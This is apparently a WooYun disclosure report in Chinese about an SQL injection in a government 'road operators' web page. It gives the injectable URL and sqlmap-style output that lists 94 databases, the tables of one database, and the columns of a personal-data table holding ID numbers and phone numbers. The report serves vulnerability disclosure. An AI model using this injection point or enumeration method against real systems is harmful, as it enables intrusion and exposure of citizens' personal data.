WooYun.org

1，http://**.**.**.**/，页面找到“道路业户”，点击进去后，找到注入点
**.**.**.**:9016/AppPage/GLYW/gl_yh_look_dh.aspx?yh=&jy=&lb=%E5%85%A8%E9%80%89
2,694个数据库沦陷
available databases [94]:
[*] 110
[*] BGT_MOA_TT
[*] BGT_MOAT
[*] BUILDING_DATA
[*] BUILDING_USER
[*] CIMS
[*] CONSOLE
[*] CTXSYS
[*] DATACENTER
[*] DBSNMP
[*] DFLZ
[*] DMSYS
[*] DZKC
[*] EP
[*] EPOINT_GGZY
[*] EPOINT_JCXT
[*] EPOINT_NJGGZY
[*] EPOINT_WEBAUDIT_NJ
[*] EXFSYS
[*] FLJG
[*] GTIG_NEWTECH_BX
[*] GTIG_NEWTECH_CENTER
[*] GTIG_NEWTECH_GC
[*] GTIG_NEWTECH_GCJD
[*] GTIG_NEWTECH_GL
[*] GTIG_NEWTECH_GX
[*] GTIG_NEWTECH_HGY
[*] GTIG_NEWTECH_JJKF
[*] GTIG_NEWTECH_JN
[*] GTIG_NEWTECH_JNKF
[*] GTIG_NEWTECH_JY
[*] GTIG_NEWTECH_LH
[*] GTIG_NEWTECH_LS
[*] GTIG_NEWTECH_NBXC
[*] GTIG_NEWTECH_PK
[*] GTIG_NEWTECH_PKXC
[*] GTIG_NEWTECH_QH
[*] GTIG_NEWTECH_QLKJCXY
[*] GTIG_NEWTECH_QX
[*] GTIG_NEWTECH_QXJD
[*] GTIG_NEWTECH_XG
[*] GTIG_NEWTECH_XW
[*] GTIG_NEWTECH_YCFW
[*] GTIG_NEWTECH_YH
[*] GZW
[*] IT
[*] JLL
[*] JTKJXM
[*] JTZFPT2
[*] JTZFRY
[*] LS_CGJ
[*] LS_JGJ
[*] MDSYS
[*] MOA2_USER
[*] MOC_MOA_USER
[*] MOC_ZYGL_USER
[*] NEWJSW
[*] NJGZW
[*] NJICCP
[*] NJICCPP
[*] NJRD
[*] NJZWFWRX2
[*] NJZYZ
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PERFSTAT
[*] SAFETY
[*] SCOTT
[*] SMC
[*] SUNTIAN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] USER_MOA
[*] USER_OA
[*] USER_XTBG
[*] USR_SPORTS_QYH
[*] USR_SPORTS_XXFB
[*] USR_SPORTSGAMES_DQ_NJ
[*] USR_SPORTSGAMES_NANJING
[*] WMSYS
[*] WW_SJGXK
[*] WW_SJJHZX
[*] XDB
[*] XXBS
[*] XZZF
[*] ZFRY
[*] ZX_CGJ
[*] ZX_HBJ
[*] ZX_JGJ
[*] ZX_JTJ
[*] ZX_QXJ
3，随便看一个库吧。
Database: NEWJSW
[175 tables]
+-------------------------------+
| BAK_JSW_DWDA_20130319 |
| BAK_JSW_DWDA_20130320 |
| BAK_JSW_DWDA_20130320_2 |
| BZ_JDB |
| BZ_JDB2 |
| BZ_JSBT_BTJGB |
| BZ_JSBT_BTJS |
| BZ_JSBT_DLGXB |
| BZ_JSBT_DWTZHB |
| BZ_JSBT_DWTZHB_NEW |
| BZ_JSBT_FFFSB |
| BZ_JSBT_JDB |
| BZ_JSBT_LSGXB |
| BZ_JSBT_QHDZB |
| BZ_JSBT_RYLBB |
| BZ_JSBT_SQB |
| BZ_JSBT_SQMCH |
| BZ_JSBT_TCQHB |
| BZ_JSBT_TXTZB |
| BZ_JSBT_XBB |
| BZ_JSBT_ZJLXB |
| BZ_JSW_BLZT |
| BZ_JSW_FAIL_REASON |
| BZ_JSW_RYLXB |
| BZ_QMB |
| BZ_SQB |
| BZ_SQB2 |
| FF |
| JSBT_DWDA |
| JSBT_DWDA_320100V3 |
| JSBT_TXDA |
| JSBT_TXDA2 |
| JSBT_TXDA_320100V3 |
| JSBT_TXDA_BC |
| JSW_DWDA |
| JSW_DWDA_20130402BAK |
| JSW_DWDA_20130403BAK |
| JSW_DWDA_20130428BAK |
| JSW_DWDA_20130617BAK |
| JSW_DWDA_20130703BAK |
| JSW_DWDA_20130901BAK |
| JSW_DWDA_20130903BAK |
| JSW_DWDA_20131009BAK |
| JSW_DWDA_20131231BAK |
| JSW_DWDA_201400701BAK |
| JSW_DWDA_201400801BAK |
| JSW_DWDA_201400911BAK |
| JSW_DWDA_20140107BAK |
| JSW_DWDA_20140220BAK |
| JSW_DWDA_20140307BAK |
| JSW_DWDA_20140320BAK |
| JSW_DWDA_20140403BAK |
| JSW_DWDA_20140505BAK |
| JSW_DWDA_20140603BAK |
| JSW_DWDA_201407DELINFO |
| JSW_DWDA_20140804BAK |
| JSW_DWDA_20141010BAK |
| JSW_DWDA_20141104BAK |
| JSW_DWDA_20141201BAK |
| JSW_DWDA_20150114BAK |
| JSW_DWDA_20150202BAK |
| JSW_DWDA_20150309BAK |
| JSW_DWDA_RECOVERY |
| JSW_DWSTATUS_LOG |
| JSW_FLOW_RYB |
| JSW_GSQKMXB |
| JSW_GSQKMXB20130301BAK |
| JSW_GSQKMXB_20130424BAK |
| JSW_GSQKMXB_20131013BAK |
| JSW_GSQKMXB_DELINFO |
| JSW_GSQKMXB_RECOVERY |
| JSW_HPQKMXB |
| JSW_HPQKMXB2 |
| JSW_HPQKMXB2B20130301BAK |
| JSW_HPQKMXB2_20131013BAK |
| JSW_HPQKMXB2_20140415BAK |
| JSW_HPQKMXB2_BAK_222 |
| JSW_HPQKMXB2_RECOVERY |
| JSW_HPQKMXB_DELINFO |
| JSW_HQ |
| JSW_HQ2 |
| JSW_JFRY |
| JSW_JFRY_RECOVERY |
| JSW_LESSFIVE_CONFIRM |
| JSW_LESSFIVE_CONFIRM_RECOVERY |
| JSW_SQJLB |
| JSW_SQJLB20130301BAK |
| JSW_SQJLB20130301_02BAK |
| JSW_SQJLB20140619 |
| JSW_SQJLB20140701 |
| JSW_SQJLB_20131013BAK |
| JSW_SQJLB_BAK20130514 |
| JSW_SQJLB_BAK20130531 |
| JSW_SQJLB_DELINFO |
| JSW_SQJLB_FAIL |
| JSW_SQJLB_RECOVERY |
| JSW_TXDA |
| JSW_TXDA_20130403BAK |
| JSW_TXDA_20130428BAK |
| JSW_TXDA_20130617BAK |
| JSW_TXDA_20130703BAK |
| JSW_TXDA_20130712BAK |
| JSW_TXDA_20130901BAK |
| JSW_TXDA_20131009BAK |
| JSW_TXDA_20131013BAK |
| JSW_TXDA_20131231BAK |
| JSW_TXDA_20140107BAK |
| JSW_TXDA_20140112BAK |
| JSW_TXDA_20140220BAK |
| JSW_TXDA_20140307BAK |
| JSW_TXDA_20140403BAK |
| JSW_TXDA_20140505BAK |
| JSW_TXDA_20140509 |
| JSW_TXDA_20140603BAK |
| JSW_TXDA_20140701BAK |
| JSW_TXDA_20140801BAK |
| JSW_TXDA_20140804BAK |
| JSW_TXDA_20140911BAK |
| JSW_TXDA_20141010BAK |
| JSW_TXDA_20141104BAK |
| JSW_TXDA_20141201BAK |
| JSW_TXDA_20141215 |
| JSW_TXDA_2014DELINFO |
| JSW_TXDA_20150114BAK |
| JSW_TXDA_20150202BAK |
| JSW_TXDA_20150309BAK |
| JSW_TXDA_BAK_20130301 |
| JSW_TXDA_DELINFO |
| JSW_TXDA_RECOVERY |
| JSW_ZFQKMXB |
| JSW_ZFQKMXB20130301BAK |
| JSW_ZFQKMXB_20131013BAK |
| JSW_ZFQKMXB_BAK20130614 |
| JSW_ZFQKMXB_BAK20130630 |
| JSW_ZFQKMXB_DELINFO |
| JSW_ZFQKMXB_JC |
| JSW_ZFQKMXB_JC20130301BAK |
| JSW_ZFQKMXB_RECOVERY |
| JSW_ZFQKMXB_TMPSFZ |
| OA_ACTMENU |
| OA_FJB |
| OA_FJCSB |
| OA_GQCSB |
| OA_JSXXB |
| OA_MANAGER_QX |
| OA_MAN_ROLES |
| OA_ROLES |
| OA_ROLES_QX |
| OA_STATUS |
| OA_THEME |
| OA_TYMENU |
| OA_TYMENU_BAK |
| OA_TZ_FJB |
| OA_TZ_SJKSB |
| OA_TZ_XXB |
| OA_XXB |
| OA_YCCSB |
| OA_YDCSB |
| TMP_JSBT_HASNOTINSERT |
| TMP_JSBT_LEFT_RY |
| TMP_JSW_DWDA68 |
| TMP_JSW_HPQKMXB |
| TMP_JSW_HPQKMXB20130301BAK |
| TMP_JSW_LESSFIVE_CONFIRM |
| TMP_JSW_SQJLB |
| TMP_JSW_STOS |
| TMP_JSW_ZFQKMXB |
| TMP_JSW_ZFQKMXB_BAK20131009 |
| TTMP_JSW_ZFQKMXB20130301BAK |
| V_USER |
| XX |
| YX_RYB |
| YX_RYB2 |
| YX_RYB2_BAK20130225 |
| ZZZ |
+-------------------------------+
4，随便找个表看看字段
Database: NEWJSW
Table: YX_RYB
[12 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| CSNY | VARCHAR2 |
| DH | VARCHAR2 |
| JD | VARCHAR2 |
| KSM | VARCHAR2 |
| QH | VARCHAR2 |
| RYH | VARCHAR2 |
| SFZ | VARCHAR2 |
| THEME | VARCHAR2 |
| XB | VARCHAR2 |
| XM | VARCHAR2 |
| YX | VARCHAR2 |
| ZCSJ | VARCHAR2 |
+--------+----------+
5，这里有身份证号码啥的，我就不贴图了，毕竟是政府的网站，我比较小心啦